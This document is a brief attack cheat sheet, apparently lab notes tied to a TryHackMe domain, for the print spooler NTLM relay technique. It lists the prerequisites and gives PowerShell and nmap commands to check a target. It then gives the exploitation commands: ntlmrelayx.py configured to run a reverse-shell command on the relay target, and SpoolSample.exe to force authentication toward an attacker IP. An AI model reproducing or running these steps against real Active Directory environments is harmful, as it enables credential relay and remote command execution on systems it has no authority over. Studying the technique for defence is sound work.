An authenticated domain user can force the print spooler service to authenticate to an arbitrary IP.

Requirements

  • A valid set of AD user credentials.
  • Network connectivity to the target’s SMB service.
  • The target host must be running the Print Spooler service.
  • The host must not have enforced SMB signing.

Check if target is vulnerable

Check if print spooler service is running on a target host:

GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc

Equivalent powershell:

Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc

If the check errors...

Sometimes Microsoft disables network access to these ports. If that happens, just try the exploit.

SMB Signing not enforced

nmap --script=smb2-security-mode -p445 source dest

Check if either the source (if on a remote pivot host) or the destination requires SMB signing.

Exploitation

The below example attacks the auth.server.domain.name by forcing a compromised host’s print spooler to authenticate against it.

Set up Authentication Relay on attacker machine (may be unstable) and specify what command to execute on auth.server.domain.name:

/usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t smb://"auth.server.domain.name" -c 'revsh command' -debug

This relays the authentication request from the print spooler service to a domain-joined machine.

Start attack on compromised host (authenticate against auth.server.domain.name through attacker_ip):

SpoolSample.exe "auth.server.domain.name" "attacker_ip"

Wait for the relay to receive authentication attempt and execute the command.